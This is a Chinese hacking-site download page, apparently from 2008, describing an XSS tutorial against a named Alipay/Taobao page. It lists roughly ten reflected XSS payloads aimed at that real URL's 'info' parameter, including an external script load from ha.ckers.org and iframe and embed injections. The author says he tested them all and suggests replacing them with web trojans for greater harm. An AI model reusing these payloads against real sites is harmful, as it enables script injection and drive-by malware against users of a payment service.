下载月排行
立即下载淘宝的xss跨站漏洞
| 软件大小: | 3.96 MB |
|---|---|
| 软件语言: | 简体中文 |
| 软件类别: | 黑客教学 - 黑客动画 |
| 授权方式: | 共享版 |
| 应用平台: | Win9X/2000/XP/2003/ |
| 更新时间: | 2008/8/19 15:33:19 |
| 开 发 商: | 暂无信息 |
| 联 系 人: | 暂无联系方式 |
| 分享收藏 | |
| 解压密码: | 本站默认解压密码:www.987654321sf.com |
| 推荐等级: |  |
| 会员中心: | 【账号登录】 【账号注册】 开通VIP下载流程 |
| 查毒情况: |  |
[复制下载页面地址给QQ/MSN上的好友]软件介绍
大家好 我是凯文比比奇
今天给大家带来一个关于xss跨站的教程
这是漏洞地址http://union.alipay.com/alipay/choujiang1/order.php
好了`大家看我操作啦 是淘宝的
看到了没
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=%3Cstrong%3E%B7%C7%B3%A3%B8%D0%D0%BB%C4%FA%B5%C4%B2%CE%D3%EB%A3%AC%B4%CB%BD%BB%D2%D7%BA%C5%B2%BB%C4%DC%B2%CE%D3%EB%B8%C3%CA%B1%B6%CE%B9%CE%BD%B1%0D%0A%CD%AC%CA%B1%C2%FA%D7%E3%D2%D4%CF%C2%CC%F5%BC%FE%B5%C4%BD%BB%D2%D7%BA%C5%BF%C9%B2%CE%D3%EB%B1%BE%C6%DA%B9%CE%BD%B1%A3%BA%3C%2Fstrong%3E%3Cbr%2F%3E%3Cul%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E%BB%EE%B6%AF%C6%DA%BC%E4%D4%DA%CC%D4%B1%A6%B9%BA%CE%EF%A3%AC%CA%D7%B4%CE%B8%B6%BF%EE%B5%BD%D6%A7%B8%B6%B1%A6%B5%C4%BD%BB%D2%D7%BA%C5%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F18-7%2F25%CD%EA%B3%C9%B8%B6%BF%EE%B5%C4%BB%E1%D4%B1%D4%DA7%2F27-8%2F1%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F26-7%2F31%CD%EA%B3%C9%BD%BB%D2%D7%B5%C4%BB%E1%D4%B1%D4%DA8%2F2-8%2F5%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3C%2Ful%3E
这是url编码
支付宝交易号是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这个页面来传递的,而url编码是http识得的
好了,既然这样那么我们可以来构造语句,当然这里是存在xss跨站漏洞的 我们来测试一下,这样上不行的 我们再来看
看到了吗。是可以的,看到了没``好了,我们再来看看其他的几种xss测试代码
都行的,下面的这些测试代码我都测试过,都通过,
测试代码:
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<script>alert(497751579)</script>
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>这段是利用<script></script>标签插如js脚本
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<IMG SRC="javascript:alert('XSS');">
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<IMG SRC=javascript:alert("XSS")>
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>这三种都是一样的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<IMG SRC=javascript:alert(String.fromCharCode(83,83,83))>利用js编码fromCharCode(83,83,83)达到跨站目的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<IFRAME SRC="javascript:alert('XSS');"></IFRAME>框架,懂挂马的朋友都知道的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<EMBED SRC="http://union.alipay.com/alipay/imagefile/market/cj_index.swf" AllowScriptAccess="always"></EMBED>这段xss是利用html里面的<embed></embed>插入.swf动画
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<SCRIPT SRC="http://union.alipay.com/alipay/imagefile/market/cj_02.jpg"></SCRIPT>这段是src带插入图片的
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=<A%20HREF="http://www.baidu.com/">administrator</A>超连接
通过<a href=""></a>来插入超连接的
![http://union.alipay.com/alipay/imagefile/market/cj_02.jpg"></SCRIPT](http://union.alipay.com/alipay/imagefile/market/cj_02.jpg"></SCRIPT){kind=link}
好了。来总结一下
该跨站是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=地址传递html值从而存在跨站的
这个漏洞也有人发现过,这里只是通过教程发出来 让大家知道跨站的危害 ,假如我们把上面这些跨站代码里面的一些javascript脚本或是swf等利用html潜入的文件改成网马之类的就存在很大的危害噢``
好了 教程就到这里吧 有什么不懂的问题就加我好了 Q:49771579
最后希望黑鹰管理员给我发一个邀请码咯 好方便以后去黑鹰和大家共同交流学习 Email:service-mail@163.com
谢谢大家观看 拜拜``